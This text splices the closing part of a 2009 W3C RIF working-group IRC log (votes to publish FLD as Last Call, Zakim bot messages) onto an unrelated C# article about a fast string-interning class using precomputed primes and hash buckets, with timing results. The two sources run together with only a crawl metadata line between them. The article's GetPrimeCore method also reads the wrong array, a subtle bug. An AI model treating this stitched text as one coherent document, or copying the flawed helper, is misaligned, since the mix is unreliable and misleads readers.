Could be changed to: "Therefore, any dialect being developed to become a standard should either be a specialization of FLD or justify its extensions to (or, deviations from) FLD"
16:26:17 [mdean]
MichaelKifer: prefer MUST and keeping logic
16:26:41 [mdean]
... but not a showstopper
16:26:42 [csma]
ack csma
16:26:55 [ChrisW]
ack csma.a
16:27:02 [ChrisW]
zakim, csma.a is csma
16:27:02 [Zakim]
+csma; got it
16:27:02 [Harold]
At later points "logic" could be kept.
16:27:47 [mdean]
csma: +1 for SHOULD, afraid of consequences of removing logic on PRD
16:28:06 [sandro]
ChrisW, let's just use SHOULD and leave in "logic".... okay?
16:28:15 [mdean]
ChrisW: still went through process, but not documented - grandfathered in
16:28:39 [sandro]
PROPOSED.... ?
16:28:51 [sandro]
ChrisW, we don't have a lot of time!!
16:29:25 [Harold]
What about: "Therefore, the development of any dialect to become a standard should start as a specialization of FLD or justify its extensions to (or, deviations from) FLD"
16:29:32 [mdean]
csma: removing logic throughout would be very painful
16:29:46 [ChrisW]
action: to update wording in intro & abstract to use "SHOULD"
16:29:46 [trackbot]
Sorry, couldn't find user - to
16:30:24 [ChrisW]
PROPOSED: go for another 10 mins?
16:30:24 [hak]
-1
16:30:25 [sandro]
+1 extend 10+ minuntes
16:30:27 [csma]
+1
16:30:30 [Harold]
+1
16:30:34 [mdean]
+1
16:30:41 [AdrianP]
+1
16:30:56 [mdean]
ChrisW: disjointness of variables and constants
16:31:01 [Zakim]
-hak
16:31:53 [mdean]
MichaelKifer: special syntax for constants would make this a mess and require disambiguation rules, e.g. open formulas
16:31:54 [csma]
action: mkifer to update wording in intro & abstract to use "SHOULD"
16:31:54 [trackbot]
Created ACTION-832 - Update wording in intro & abstract to use "SHOULD" [on Michael Kifer - due 2009-06-02].
16:32:26 [mdean]
ChrisW: don't require all dialects, but allow free variables in framework
16:32:38 [mdean]
s/all/in all/
16:32:59 [mdean]
MichaelKifer: require would substantial revisions
16:33:27 [mdean]
... need to think of what changes would require, but don't see much value
16:33:47 [mdean]
ChrisW: don't have particular use case, but note that it is allowed in Common Logic
16:34:20 [mdean]
MichaelKifer: if it's quantified, you know it's a variable
16:35:10 [mdean]
s/require would/would require/
16:35:25 [sandro]
MichaelKifer: because it's an exchange language, you always apply some sort of transformation anyway.
16:35:28 [mdean]
Harold: some editorial edits
16:35:43 [mdean]
... introduced extension points - now also in schema
16:36:03 [mdean]
MichaelKifer: haven't looked at Stella's message today
16:36:15 [ChrisW]
PROPOSED: Publish FLD as Last Call pending completion of action 832
16:36:17 [mdean]
StellaMitchell: clarification regarding XML serialization
16:36:33 [ChrisW]
+1
16:36:34 [sandro]
+1
16:36:38 [MichaelKifer]
+1
16:36:39 [StellaMitchell]
+1
16:36:40 [Harold]
+1
16:36:41 [mdean]
+1
16:36:44 [josb]
+1
16:36:44 [ChrisW]
Leora: +1 (on phone)
16:36:49 [AdrianP]
+1
16:36:54 [apollere2]
+1
16:37:01 [Gary]
+1
16:37:19 [cke]
+1
16:37:30 [ChrisW]
RESOLVED: Publish FLD as Last Call pending completion of action 832
16:37:55 [csma]
clap! clap! clap!
16:38:06 [mdean]
ChrisW: good work!
16:38:19 [mdean]
... long road
16:38:35 [ChrisW]
zakim, take up item 7
16:38:35 [Zakim]
agendum 7. "XML Schema task force" taken up [from ChrisW]
16:39:03 [Zakim]
-josb
16:39:16 [mdean]
ChrisW: glossed over several issues in normative exchange syntax
16:39:56 [mdean]
ChrisW: task force will meet regularly during Last Call, finish modularization, etc.
16:39:59 [cke]
How long will be task force be?
16:40:07 [csma]
I will send an email tomorrow
16:40:10 [mdean]
... csma will be leading the task force
16:40:16 [ChrisW]
zakim, take up item 8
16:40:16 [Zakim]
agendum 8. "WG Future and schedule" taken up [from ChrisW]
16:40:31 [AdrianP]
have not received any invite for the task force?
16:40:41 [mdean]
ChrisW: expecting a telecon next week and the week after that
16:41:02 [csma]
action: csma to send email about the XML schemas TF
16:41:02 [trackbot]
Created ACTION-833 - Send email about the XML schemas TF [on Christian de Sainte Marie - due 2009-06-02].
16:41:08 [mdean]
... then reduce to at least once a month to respond to LC comments as needed
16:41:15 [csma]
zakim, numute me
16:41:15 [Zakim]
I don't understand 'numute me', csma
16:41:22 [mdean]
... still reserve time slot but don't need every week
16:41:22 [csma]
zakim, unmute me
16:41:22 [Zakim]
csma was not muted, csma
16:41:41 [ChrisW]
zakim, take up item 9
16:41:41 [Zakim]
agendum 9. "rdf:text" taken up [from ChrisW]
16:41:43 [csma]
zakim, mute me
16:41:43 [Zakim]
csma should now be muted
16:42:16 [mdean]
Sandro: any problems with replacing rdf:text with rdf:plainLiteral?
16:43:00 [sandro]
rdf:PlainLiteral (capital P)
16:43:03 [csma]
ack csma
16:43:03 [mdean]
ChrisW: adjourned
16:43:07 [Zakim]
-Gary
16:43:11 [Zakim]
-LeoraMorgenstern
16:43:20 [Zakim]
-StellaMitchell
16:43:21 [ChrisW]
zakim, list attendees
16:43:21 [Zakim]
-Harold
16:43:23 [Zakim]
As of this point the attendees have been Sandro, ChrisW, mdean, cke, hak, Harold, DaveReynolds, AdrianP, josb, Gary, csma, MichaelKifer, StellaMitchell, AxelPolleres,
16:43:25 [Zakim]
... LeoraMorgenstern
16:43:30 [ChrisW]
rrsagent, make minutes
16:43:30 [RRSAgent]
I have made the request to generate
ChrisW
16:43:41 [Zakim]
-AdrianP
16:43:48 [csma]
zakim, who is the phone?
16:43:48 [Zakim]
I don't understand your question, csma.
16:43:54 [Zakim]
-cke
16:43:55 [Zakim]
-MichaelKifer
16:43:55 [Zakim]
-mdean
16:43:58 [ChrisW]
zakim, who is on the phone?
16:43:58 [Zakim]
On the phone I see Sandro, ChrisW, csma, AxelPolleres
16:44:14 [Zakim]
-AxelPolleres
16:44:55 [Zakim]
-ChrisW
16:44:56 [Zakim]
-Sandro
16:44:56 [Zakim]
-csma
16:44:58 [Zakim]
SW_RIF()11:00AM has ended
16:44:59 [Zakim]
Attendees were Sandro, ChrisW, mdean, cke, hak, Harold, DaveReynolds, AdrianP, josb, Gary, csma, MichaelKifer, StellaMitchell, AxelPolleres, LeoraMorgenstern
16:45:54 [MichaelKifer]
MichaelKifer has left #rif
16:53:22 [AdrianP]
Is it possible to have it one hour later 6 pm CEST?
16:57:21 [MoZ]
MoZ has joined #rif
17:02:23 [csma]
csma has left #rif
17:33:36 [sandro]
Zakim, room for 2?
17:33:37 [Zakim]
ok, sandro; conference Team_(rif)17:33Z scheduled with code 7431 (RIF1) for 60 minutes until 1833Z
18:34:45 [sandro]
sandro has joined #rif | http://www.w3.org/2009/05/26-rif-irc | CC-MAIN-2013-48 | refinedweb | 4,545 | 60.89 |
This article is about a class called UniqueStringList, various versions of which I have been using for many years. I thought it was fully optimized but I recently used a couple of new techniques to make it twice as quick and thought I would share them with you.
UniqueStringList
Reusing the same copy of a distinct string value is called String Interning. String Interning is a good thing for two main reasons:
The C# compiler automatically Interns all literal strings within your source files when building an assembly. You may have seen the String.Intern() method. Don't use it in your code! Any string you add to this Intern Pool cannot be removed and will stay there until your app closes!
String.Intern()
Although not String Interning per se, in my Optimizing Serialization in .NET article, one of the biggest optimizations was to produce a token for each unique string being serialized. It did not affect the strings on the serializing end but ensured that at the deserializing end, only one copy of the string would exist - automatically interned if you will.
Prevention of duplicate strings is very beneficial if you can remove the duplicates at source. Imagine a CSV file being read with 100,000 lines and assume that some string appears on every line (e.g., "No fault found"). Since each line is read separately and has no knowledge of the lines above and below it, you will be storing 100,000 copies of that same string in memory. If you can Intern all the strings read from a single line, you will end up with just one copy of each unique string, which can save megabytes of memory.
It is a similar case when reading XML files or retrieving data from a middle tier layer and creating POCOs (Plain Old Class Objects) for each item, the chances are you will be getting duplicates of the strings involved unless you remove them yourself.
Imagine displaying a large amount of data in a grid. You click on the filter icon in the header and, after a short pause, it displays a list of unique items to filter against. Wouldn't it be nice if the process of generating this list was so quick it appeared instantly?
An even simpler scenario is just asking whether the string has been seen before and maybe skipping some processing if it has.
Of course, the process of interning strings is not free, it will take some time and so the less time it takes, the better, and that is what this article is about. Also, don't forget that you will be saving some time by making fewer memory allocations and so ultimately you could get the best of both words: large memory savings with little or no additional overhead.
So we have some scenarios here for string Interning/identifying duplicates but with slightly different requirements:
bool
The code I eventually came up with uses ideas from three sources:
HashSet<T>
Slot
HashHelpers
System.Collections
System.Collections.Generic
internal
To promote reusability, I have created a MathHelper class and a QuickDivideInfo struct and the code for these is listed below. These incorporate the ideas of pre-calculating Golden Primes and pre-calculating the Fast Division information for them.
MathHelper
QuickDivideInfo
From the QuickDivideInfo struct, only the ModuloPositive() method is actually used by UniqueStringList but I have included the other methods for completeness and checked them against all possible int numerators. Apart from int.MinValue, all other values return exactly the same result as the '%' operator but 3 times faster.
ModuloPositive()
int
int.MinValue
%
My time testing has shown that all these methods are inlinable.
I have also added unchecked statements around the arithmetic since there is no chance of overflow. Therefore compiling with the "Check for arithmetic overflow/underflow" option set will not affect the speed increase.
public struct QuickDivideInfo
{
public readonly int Divisor;
public readonly long Multiplier;
public readonly int Shift;
public QuickDivideInfo(int divisor, long multiplier, int shift)
{
Divisor = divisor;
Multiplier = multiplier;
Shift = shift;
}
public int Divide(int numerator)
{
return numerator < 0 ? DivideNegative(numerator) : DividePositive(numerator);
}
public int DividePositive(int numerator)
{
unchecked
{
return (int) ((numerator * Multiplier) >> Shift);
}
}
// Does not work with int.MinValue as the numerator!
public int DivideNegative(int numerator)
{
unchecked
{
return (int) -((-numerator * Multiplier) >> Shift);
}
}
public int Modulo(int numerator)
{
return numerator < 0 ? ModuloNegative(numerator) : ModuloPositive(numerator);
}
public int ModuloPositive(int numerator)
{
return numerator - DividePositive(numerator) * Divisor;
}
// Does not work with int.MinValue as the numerator!
public int ModuloNegative(int numerator)
{
return numerator - DivideNegative(numerator) * Divisor;
}
}
For completeness, I have also added the normal pre-calculated Primes as used by Microsoft and pre-calculated their Fast Division information too.
public static class MathHelper
{
public const int Lower31BitMask = 0x7fffffff;
// Allows quadrupling of bucket table size for smaller sizes then
// reverting to doubling.
static readonly int[] GoldenPrimeAccelerators =
new[]
{
389, 1543, 6151, 24593, 98317
};
// Based on Golden Primes (as far as possible from nearest two powers of two)
// at
// and Optimizing integer divisions with Multiply Shift in C#
// at <a href="/KB/string/FindMulShift.aspx">FindMulShift.aspx</a>
static readonly QuickDivideInfo[] GoldenPrimes =
new[]
{
new QuickDivideInfo(53, 1296593901, 36), // acceration skip
new QuickDivideInfo(97, 354224107, 35), // acceration skip
new QuickDivideInfo(193, 356059465, 36), // acceration skip
new QuickDivideInfo(389, 2826508041, 40),
new QuickDivideInfo(769, 2859588109, 41), // acceration skip
new QuickDivideInfo(1543, 356290223, 39),
new QuickDivideInfo(3079, 714200473, 41), // acceration skip
new QuickDivideInfo(6151, 178753313, 40),
new QuickDivideInfo(12289, 1431539267, 44), // acceration skip
new QuickDivideInfo(24593, 2861332257, 46),
new QuickDivideInfo(49157, 1431510145, 46), // acceration skip
new QuickDivideInfo(98317, 2862932929, 48),
new QuickDivideInfo(196613, 715809679, 47),
new QuickDivideInfo(393241, 1431564749, 49),
new QuickDivideInfo(786433, 1431653945, 50),
new QuickDivideInfo(1572869, 2863302429, 52),
new QuickDivideInfo(3145739, 2863301519, 53),
new QuickDivideInfo(6291469, 2863305615, 54),
new QuickDivideInfo(12582917, 1431655197, 54),
new QuickDivideInfo(25165843, 1431654685, 55),
new QuickDivideInfo(50331653, 2863311247, 57),
new QuickDivideInfo(100663319, 2863310877, 58),
new QuickDivideInfo(201326611, 2863311261, 59),
new QuickDivideInfo(402653189, 357913937, 57),
new QuickDivideInfo(805306457, 2863311215, 61),
new QuickDivideInfo(1610612741, 1431655761, 61),
};
// Based on the list of primes in Systems.Collections.Generic.HashHelpers
static readonly QuickDivideInfo[] Primes =
new[]
{
new QuickDivideInfo(3, 2863311531, 33),
new QuickDivideInfo(7, 2454267027, 34),
new QuickDivideInfo(11, 780903145, 33),
new QuickDivideInfo(17, 2021161081, 35),
new QuickDivideInfo(23, 2987803337, 36),
new QuickDivideInfo(29, 2369637129, 36),
new QuickDivideInfo(37, 3714566311, 37),
new QuickDivideInfo(47, 2924233053, 37),
new QuickDivideInfo(59, 582368447, 35),
new QuickDivideInfo(71, 3871519817, 38),
new QuickDivideInfo(89, 3088515809, 38),
new QuickDivideInfo(107, 1284476201, 37),
new QuickDivideInfo(131, 1049152317, 37),
new QuickDivideInfo(163, 210795941, 35),
new QuickDivideInfo(197, 1395319325, 38),
new QuickDivideInfo(239, 2300233531, 39),
new QuickDivideInfo(293, 3752599413, 40),
new QuickDivideInfo(353, 3114763819, 40),
new QuickDivideInfo(431, 2551071063, 40),
new QuickDivideInfo(521, 1055193501, 39),
new QuickDivideInfo(631, 871245347, 39),
new QuickDivideInfo(761, 1444824741, 40),
new QuickDivideInfo(919, 2392843587, 41),
new QuickDivideInfo(1103, 498418689, 39),
new QuickDivideInfo(1327, 3314277703, 42),
new QuickDivideInfo(1597, 2753942713, 42),
new QuickDivideInfo(1931, 284700059, 39),
new QuickDivideInfo(2333, 1885146383, 42),
new QuickDivideInfo(2801, 785085061, 41),
new QuickDivideInfo(3371, 2609342339, 43),
new QuickDivideInfo(4049, 2172411219, 43),
new QuickDivideInfo(4861, 904761677, 42),
new QuickDivideInfo(5839, 188304783, 40),
new QuickDivideInfo(7013, 2508510773, 44),
new QuickDivideInfo(8419, 2089581429, 44),
new QuickDivideInfo(10103, 870641693, 43),
new QuickDivideInfo(12143, 1448751219, 44),
new QuickDivideInfo(14591, 602843741, 43),
new QuickDivideInfo(17519, 2008355049, 45),
new QuickDivideInfo(21023, 1673613285, 45),
new QuickDivideInfo(25229, 1394600345, 45),
new QuickDivideInfo(30293, 2322937451, 46),
new QuickDivideInfo(36353, 3871413319, 47),
new QuickDivideInfo(43627, 3225926339, 47),
new QuickDivideInfo(52361, 167989401, 43),
new QuickDivideInfo(62851, 1119612165, 46),
new QuickDivideInfo(75431, 932888921, 46),
new QuickDivideInfo(90523, 97169703, 43),
new QuickDivideInfo(108631, 2591110979, 48),
new QuickDivideInfo(130363, 2159163081, 48),
new QuickDivideInfo(156437, 1799286465, 48),
new QuickDivideInfo(187751, 2998385913, 49),
new QuickDivideInfo(225307, 1249295303, 48),
new QuickDivideInfo(270371, 2082138815, 49),
new QuickDivideInfo(324449, 1735095357, 49),
new QuickDivideInfo(389357, 722922605, 48),
new QuickDivideInfo(467237, 2409697663, 50),
new QuickDivideInfo(560689, 2008064911, 50),
new QuickDivideInfo(672827, 1673386929, 50),
new QuickDivideInfo(807403, 87154425, 46),
new QuickDivideInfo(968897, 2324085857, 51),
new QuickDivideInfo(1162687, 1936720557, 51),
new QuickDivideInfo(1395263, 403472287, 49),
new QuickDivideInfo(1674319, 336226223, 49),
new QuickDivideInfo(2009191, 1120749503, 51),
new QuickDivideInfo(2411033, 933956447, 51),
new QuickDivideInfo(2893249, 1556589021, 52),
new QuickDivideInfo(3471899, 1297157443, 52),
new QuickDivideInfo(4166287, 135120301, 49),
new QuickDivideInfo(4999559, 56299961, 48),
new QuickDivideInfo(5999471, 3002664487, 54),
new QuickDivideInfo(7199369, 2502219085, 54),
};
public static bool IsPrime(int candidate)
{
if ((candidate & 1) == 0)
{
return candidate == 2;
}
int max = (int) Math.Sqrt(candidate);
for (int i = 3; i <= max; i += 2)
{
if (candidate % i == 0)
{
return false;
}
}
return true;
}
public static int GetPrime(int min)
{
return GetPrimeCore(Primes, min);
}
public static int GetGoldenPrime(int min)
{
return GetPrimeCore(GoldenPrimes, min);
}
public static QuickDivideInfo GetPrimeInfo(int min)
{
return GetPrimeInfoCore(Primes, min);
}
public static QuickDivideInfo GetGoldenPrimeInfo(int min, bool accelerate = true)
{
if (accelerate)
{
foreach (var goldenPrimeAccelerator in GoldenPrimeAccelerators)
{
if (min > goldenPrimeAccelerator) continue;
min = goldenPrimeAccelerator;
break;
}
}
return GetPrimeInfoCore(GoldenPrimes, min);
}
static QuickDivideInfo GetPrimeInfoCore(QuickDivideInfo[] set, int min)
{
for (int i = 0; i < set.Length; ++i)
{
if (set[i].Divisor >= min)
{
return set[i];
}
}
throw new ArgumentOutOfRangeException("min",
"You really need a prime larger than 1,610,612,741?!");
}
static int GetPrimeCore(QuickDivideInfo[] set, int min)
{
for (int i = 0; i < set.Length; ++i)
{
int num = Primes[i].Divisor;
if (num >= min) return num;
}
for (int i = min | 1; i < 2147483647; i += 2)
{
if (IsPrime(i))
{
return i;
}
}
return min;
}
public static bool IsPowerOfTwo(int value)
{
return value > 0 && (value & (value - 1)) == 0;
}
public static bool IsPowerOfTwo(long value)
{
return value > 0 && (value & (value - 1)) == 0;
}
}
I have kept this class lean and mean for performance purposes.
Clear()
Count
Contains()
IndexOf()
this[]
Add()
Intern()
public sealed class UniqueStringList
{
const float LoadFactor = .72f;
Slot[] slots;
int[] buckets;
int slotIndex;
QuickDivideInfo quickDivideInfo;
public UniqueStringList()
{
Expand(0);
}
public UniqueStringList(int capacity)
{
Expand(capacity);
}
public int Count
{
get { return slotIndex; }
}
public void Clear()
{
Array.Clear(slots, 0, slotIndex);
Array.Clear(buckets, 0, buckets.Length);
slotIndex = 0;
}
public string Intern(string item)
{
int index;
return slotIndex == (index = AddIfMissing(item)) ? item : slots[index].Value;
}
public void Intern(ref string item)
{
int index;
if (slotIndex != (index = AddIfMissing(item)))
{
item = slots[index].Value;
}
}
public void AddRange(IEnumerable<string> items)
{
foreach (var item in items)
{
if (item == null) continue;
AddIfMissing(item);
}
}
public bool Add(string item)
{
return slotIndex == AddIfMissing(item);
}
public bool Add(string item, out int index)
{
return slotIndex == (index = AddIfMissing(item));
}
public IEnumerable<string> GetItems()
{
var index = 0;
while(index < slotIndex)
{
yield return slots[index++].Value;
}
}
public string this[int index]
{
get { return slots[index].Value; }
}
public bool Contains(string item)
{
return IndexOf(item) != -1;
}
public int IndexOf(string item)
{
int hashCode = item.GetHashCode() & MathHelper.Lower31BitMask;
int bucketIndex = quickDivideInfo.ModuloPositive(hashCode);
for (int i = buckets[bucketIndex] - 1; i >= 0; i = slots[i].Next)
{
if (slots[i].HashCode == hashCode && string.Equals(slots[i].Value, item))
{
return i;
}
}
return -1;
}
int AddIfMissing(string item)
{
var hashCode = item.GetHashCode() & MathHelper.Lower31BitMask;
var bucketIndex = quickDivideInfo.ModuloPositive(hashCode);
for (int i = buckets[bucketIndex] - 1; i >= 0; i = slots[i].Next)
{
if (slots[i].HashCode == hashCode && string.Equals(slots[i].Value, item))
{
return i;
}
}
if (slotIndex == slots.Length)
{
Expand(slots.Length + 1);
bucketIndex = quickDivideInfo.ModuloPositive(hashCode);
}
slots[slotIndex].HashCode = hashCode;
slots[slotIndex].Value = item;
slots[slotIndex].Next = buckets[bucketIndex] - 1;
buckets[bucketIndex] = ++slotIndex;
return slotIndex - 1;
}
void Expand(int capacity)
{
quickDivideInfo = MathHelper.GetGoldenPrimeInfo(Math.Max(quickDivideInfo.Divisor + 1,
(int) (capacity / LoadFactor)));
capacity = Math.Max(capacity, (int) (quickDivideInfo.Divisor * LoadFactor));
buckets = new int[quickDivideInfo.Divisor];
Array.Resize(ref slots, capacity);
for (int i = 0; i < slotIndex; ++i)
{
int bucketIndex = quickDivideInfo.ModuloPositive(slots[i].HashCode);
slots[i].Next = buckets[bucketIndex] - 1;
buckets[bucketIndex] = i + 1;
}
}
struct Slot
{
public int HashCode;
public string Value;
public int Next;
}
}
For simple interning use, there are two Intern() overloads:
var myString = myUniqueStringList.Intern(myString);
ref
myUniqueStringList.Intern(ref myPOCOClass.AStringField);
There are also two Add() overloads:
true
false
var justAdded = myUniqueStringList.Add("XXX");
int index;
if (myUniqueStringList.Add("XXX", ref index)
{
...
}
The AddRange() method allows the addition of multiple strings at once (nulls are checked here and will be ignored).
AddRange()
The GetItems() method returns an enumerator to extract the unique strings in the order they were added. The output from this can populate a string[] or List<string> or whatever.
GetItems()
string[]
List<string>
The highest level overview for the process is: given an input string, we look in a list for a string that is equal to it and return its index within that list. If the string cannot be found, then it is added to the end of the list and that index is returned.
The main problem is the speed at which the list of strings is searched. We could start at the top and then check each string in turn until we find one that is equal. However, imagine a million strings to search - it would take, on average, 500,000 equality checks to find an existing string (and a full million if the string was not found!). This would be far too slow, of course.
An alternative is to sort the strings as they are added. It would then be very quick to locate a string by using a binary search but incredibly slow to build the list in the first place, since strings would have to be constantly shuffled to keep them sorted. Also, the requirements define a non-changing index so this would not work anyway.
What we need is to retain the idea of being able to just append new strings to the list but when searching the list, reducing the number of comparisons to be the fewest possible. Hashing is the solution; this quickly identifies a very small subset of the strings that could match the input string (or, if you prefer, to exclude all those strings that cannot be equal). We then just need to check against those to see if any is a match.
Hashing uses an array of 'hash buckets' and calculating into which 'bucket' an item should be placed or associated. For a given item, the calculation will always choose the same bucket, thus the contents of all other buckets can be ignored because they cannot contain the sought item. This is what gives hashing its fast search speed.
Hashing is achieved by producing a hash code for an item - a simple int value, usually obtained by its GetHashCode() method, although any method can be used. For our purposes, it is effectively a 'random' number between int.MinValue and int.MaxValue that is guaranteed to be the same for strings with the same content. It is not unique however - completely different strings can produce the same hash code but a good hashing algorithm will produce numbers evenly spread over the whole int range to minimize this. So for example, using words from my test dictionary:
GetHashCode()
int.MaxValue
"wren".GetHashCode() -> 1400949012
"inwood".GetHashCode() -> 1400949012
This produces 'collisions' which are expected and dealt with in any hashing system.
But it is not the only source of collisions:
"bougainvillia".GetHashCode() -> 1516975564
"aniseroot".GetHashCode() -> -630508084
Because we need to choose a bucket in an array, we need a positive number, so we have to make the hash code positive. The quickest way is to simply mask off the top bit - the negative flag - and so our latter case ends up with the same positive number, 1516975564, as the former - another source of collisions.
Furthermore, since the buckets are in the form of an array, we need to calculate an index between 0 and buckets.Length - 1, done using a modulo operation, which will result in even more collisions. If we have more buckets, fewer collisions would be created by this final step. This reduces the number of equality checks but would require more memory. If we have fewer buckets, we save some memory but would have to do more equality checks - the old speed vs. memory trade-off. So often in hashing, use a Load Factor is for the buckets which defines a reasonable compromise. When this load factor is reached (we are using 72%, for example), we increase the number of buckets and recalculate the buckets for the existing items to spread them out.
buckets.Length
Collisions are dealt with by looking at each item associated with the bucket and performing equality checks to find the exact match - in our case, a string equality check. The number of checks we need to do will be tiny compared to the total strings in the list. Our system will use a linked list of Slots, the head of which is pointed to by the bucket. Although this collision resolution sounds problematic and potentially slow, in reality the figures are excellent. In my tests, after I added 213,557 unique strings, the longest chain is 7 and the average chain length is 1.2717 - much better than the 106,778 average if we tried to search sequentially!
So we will use two arrays. The first array will store Slot structs (which contain the string itself, the positive hash code to save recalculation when expanding, and an index to the next Slot in the linked list). The second array is for the hash buckets - a simple int[] which holds an index to the head item in the Slot array.
int[]
Our refined high-level overview changes to: given the input string, we obtain a hash code for it. From the hash code, we get a bucket index. From the bucket index, we get a Slot index. If we are lucky then the Slot will hold the string we are looking for; if not, the Slot.Next property will direct us to another Slot to try - a linked list within the array. If we reach the end of the linked list and have still not found our string, then it must be new and we add it into the system.
Slot.Next
Most of the work is done in the AddIfMissing() method.
AddIfMissing()
The first step is to get a hash code for the item and make it a positive number by ANDing it with 01111111111111111111111111111111 to mask off the negative flag. Then we calculate a bucket index from the positive hash code using our souped-up modulo operation (i.e., the remainder after dividing by the number of buckets).
The content of the bucket is an int being a 'pointer' into the slots array, but note that in the for/next loop, we subtract one first to get the actual index to use. The reason for this is that when an array is created, it initially contains all zeros (all memory allocations work this way). We could set all values in the buckets array to be -1 to indicate an empty bucket, but this would be slower than just assuming that the contents of the array are all 1-based and always subtracting 1 to get the 0-based head Slot index. An empty bucket would hold its original 0 but the for loop would then start with i == -1 and jump out immediately because of the conditional expression. If the for/next loop is entered, then this indicates a valid Slot but not necessarily holding our search string. We compare hash codes first (the positive hash code we stored) and only if they are the same do we need to actually compare the strings. If we find a match, we jump out of the loop with the search complete and the index found, otherwise the loop-expression will use the Next member of the Slot to set i to the next Slot to try. (A Next with a -1 will indicate the end of the list with the item not found and jump out of the loop.)
for/next
i == -1
i
If execution ends up after the for/next loop, then the search string has not been located and will need to be added to the list. At this point, we check to see if the slots array is currently full and, if it is, call the Expand method to increase it (and the buckets array in proportion), not forgetting to recalculate the bucket index. The last unused Slot is then populated with the information we have and its index returned to the caller. Thus any string is always found. Note how the Next member is set to buckets[bucketIndex] - 1 which was the head of the linked list. This Slot will now become second in the linked list, with our newly populated Slot becoming the head. We increment slotIndex first and then store it in the buckets array (the increment is done first because buckets is 1-based) to make it officially the head Slot for the hash code.
slots
Expand
buckets
buckets[bucketIndex] - 1
slotIndex
The Expand() method is even simpler. The first thing is to calculate the new number of buckets always ensuring we use a Golden Prime number and one that is larger than the previous one used. We store this QuickDivideInfo struct and adjust the capacity variable to match our LoadFactor.
Expand()
LoadFactor
The increase in bucket capacity invalidates the existing buckets so they are simply thrown away and recreated as a new array. The slots array still holds (mostly) valid information so Array.Resize is used to increase the capacity but preserve the existing Slots. The final step is to recreate the hash buckets from the preserved Slots. The loop iterates over all the existing Slots and uses the positive hash code we preserved to calculate the new bucket index without having to call GetHashCode() again - another improvement over the original code, especially for long strings. The Next member on the Slot is set to whatever the current bucket holds, and then the bucket is updated to point to the current Slot (adjusting for the 1-based indexing in both cases). Thus the linked list is recreated automatically.
Array.Resize
The other code is straightforward but it might be worth pointing out that the code in the Add() and Intern() methods all rely on C#'s left to right expression evaluation to detect when a string has just been added to the list. The *current* slotIndex is evaluated first and then AddIfMissing() is called which may increment slotIndex. If the numbers are the same then the string was just added. Note however that if AddIfMissing() is called first then this will not work and will always return false.
A question was asked about the code used to test performance so I have now added a download containing the whole solution (.NET 4.0/VS2010) including the source code above and the performance testing code (based on NUnit 2.5.2).
Whilst I was tidying the code so it was suitable for release, I refactored the speed testing code into an abstract class suitable for reuse. You just need to inherit your test class from TimingTestFixture and you will have access to the same performance testing code.
TimingTestFixture
As an example, a [Test] method would look like:
[Test]
[Test]
public void UniqueStringList_AddCopies()
{
TimeProcess(() =>
{
var l = new UniqueStringList();
for (var i = 0; i < words.Length; i++)
{
l.Add(words[i]);
l.Add(copiedWords[i]);
}
Assert.AreEqual(words.Length, l.Count);
});
}
and return this output to the Console (or Unit Test Output Window):
Timing per Process; 10 sets; 20 repeats per set; GC Mode=PerRepeat:
1: Total set time=639 ms. Average process time=31.950000 ms. GC(62/62/61). Memory used=6,236,952 bytes.
2: Total set time=640 ms. Average process time=32.000000 ms. GC(61/61/61). Memory used=6,236,952 bytes.
3: Total set time=639 ms. Average process time=31.950000 ms. GC(61/61/61). Memory used=6,236,952 bytes.
4: Total set time=626 ms. Average process time=31.300000 ms. GC(2077/2077/61). Memory used=6,236,952 bytes.
5: Total set time=627 ms. Average process time=31.350000 ms. GC(1088/1088/61). Memory used=6,236,952 bytes.
6: Total set time=628 ms. Average process time=31.400000 ms. GC(61/61/61). Memory used=6,236,952 bytes.
7: Total set time=625 ms. Average process time=31.250000 ms. GC(1248/1248/61). Memory used=6,236,952 bytes.
8: Total set time=626 ms. Average process time=31.300000 ms. GC(596/596/61). Memory used=11,196,296 bytes.
9: Total set time=627 ms. Average process time=31.350000 ms. GC(912/912/61). Memory used=6,236,952 bytes.
10: Total set time=629 ms. Average process time=31.450000 ms. GC(61/61/61). Memory used=6,236,952 bytes.
All:
Fastest: 625 ms, Slowest: 640 ms, Average: 630.60 ms (31.530000 ms), StdDevP: 5.82 ms (0.92%)
Best 9: (excludes 2).
Fastest: 625 ms, Slowest: 639 ms, Average: 629.56 ms (31.477778 ms), StdDevP: 5.17 ms (0.82%)
Best 8: (excludes 1-2).
Fastest: 625 ms, Slowest: 639 ms, Average: 628.38 ms (31.418750 ms), StdDevP: 4.18 ms (0.67%)
Best 7: (excludes 1-3).
Fastest: 625 ms, Slowest: 629 ms, Average: 626.86 ms (31.342857 ms), StdDevP: 1.25 ms (0.20%)
As you can see, the output is reasonably comprehensive. As well as the set/per process timings, it also shows memory usage and the counts for each Garbage Collection Generation collected during each set.
The additional summaries at the bottom show the figures when the slower sets are excluded, which can be useful when other processes on your machine happen to kick in and slow you down when you are performance testing.
The tests can be executed using Resharper's Unit Test Runner (or equivalent) for maximum convenience, or individually as a Console application to give slightly more accurate and faster figures. Either way, always remember to ensure Release Mode is on!
TimingTestFixture has a number of properties such as TimingCount (default=10), RepeatCount (default=20), and so on.
TimingCount
RepeatCount
You can change any/all the figures by adding a constructor to your [TestFixture] class which calls this constructor on TimingTestFixture:
[TestFixture]
protected TimingTestFixture(int defaultTimingCount = 10,
int defaultRepeatCount = 20,
GarbageCollectMode defaultGarbageCollectMode =
GarbageCollectMode.PerRepeat,
TimingMode defaultTimingMode = TimingMode.AutoByRepeatCount,
bool defaultPerformJITPass = true,
bool defaultUseHighPriorityThread = true)
All tests in your class will then use your default settings.
Additionally, you can set any of the properties at the start of your [Test] method to override the default for that method only - TimingTestFixture/Nunit will reset back to the defaults before running other [Test] methods.
For comparison, UniqueStringListOriginal returned these figures:
UniqueStringListOriginal
Timing per Process; 10 sets; 20 repeats per set; GC Mode=PerRepeat:
1: Total set time=1,286 ms. Average process time=64.300000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
2: Total set time=1,285 ms. Average process time=64.250000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
3: Total set time=1,285 ms. Average process time=64.250000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
4: Total set time=1,285 ms. Average process time=64.250000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
5: Total set time=1,289 ms. Average process time=64.450000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
6: Total set time=1,287 ms. Average process time=64.350000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
7: Total set time=1,291 ms. Average process time=64.550000 ms. GC(61/61/61). Memory used=4,824,344 bytes.
